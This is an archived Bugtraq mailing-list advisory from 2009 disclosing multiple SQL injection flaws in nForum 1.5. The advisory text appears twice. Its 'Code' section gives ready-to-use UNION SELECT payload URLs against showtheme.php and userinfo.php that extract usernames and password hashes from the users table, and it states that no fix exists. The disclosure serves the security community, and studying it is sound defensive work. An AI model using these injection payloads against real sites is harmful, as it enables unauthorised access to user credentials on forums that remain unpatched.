nForum 1.5 Multiple SQL Injection

To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
Subject: nForum 1.5 Multiple SQL Injection
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
Date: Fri, 6 Mar 2009 21:42:37 +0100
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=5a+w8N9uF0SH2U4TS41OO0tq6doRFUQ3qQivuNsbKi8=; b=W1RE4wuZBl34qm3wv8OBwhOdAEmr7+Wgc0WeojqOjhAZTeaoH0XJeRFnigV8reu7zL EmPhckRGcyNfPZaeTIXK2DU0TGa9CAAspJ6QshHYrKZtX7GALHSvXkjR7dzKLyj427q+ bg3O/EpObfW4LxqnK/kI5TzbOaKJHAxetCf9Q=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=MtCyKBMn9trO5jjhL/odTcYoHkfiM8Eozvh4QcF5cyfXSZ05k9PJK+L9aa8sBGf9cb k1l9hPYKe5NunHUjIPLGTyGL3sytRqGwlQKwjeAL3LHZ0lxNA5imPG9rhx6r86ECnscG VvAOXznttSz9N3NFeAGeStY3AgOfSwtWHJ+BA=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

*******   Salvatore "drosophila" Fresta   *******

[+] Application: nForum
[+] Version: 1.5
[+] Website: http://sourceforge.net/projects/nforum/

[+] Bugs: [A] Multiple SQL Injection

[+] Exploitation: Remote
[+] Date: 06 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: showtheme.php, userinfo.php

These bugs allows a guest to view username and
the password of a registered user.


*************************************************

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT
1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23

http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT
1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

*******   Salvatore "drosophila" Fresta   *******

[+] Application: nForum
[+] Version: 1.5
[+] Website: http://sourceforge.net/projects/nforum/

[+] Bugs: [A] Multiple SQL Injection

[+] Exploitation: Remote
[+] Date: 06 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: showtheme.php, userinfo.php

These bugs allows a guest to view username and 
the password of a registered user.


*************************************************

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 
0x3a, passwd_hash),NULL,5,6,7 FROM users%23

http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 
1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23


*************************************************

[+] Fix

No fix.


*************************************************

Prev by Date: [ GLSA 200903-01 ] Vinagre: User-assisted execution of arbitrary code
Next by Date: [ GLSA 200903-02 ] ZNC: Privilege escalation
Previous by thread: [ GLSA 200903-01 ] Vinagre: User-assisted execution of arbitrary code
Next by thread: [ GLSA 200903-02 ] ZNC: Privilege escalation
Index(es):
- Date
- Thread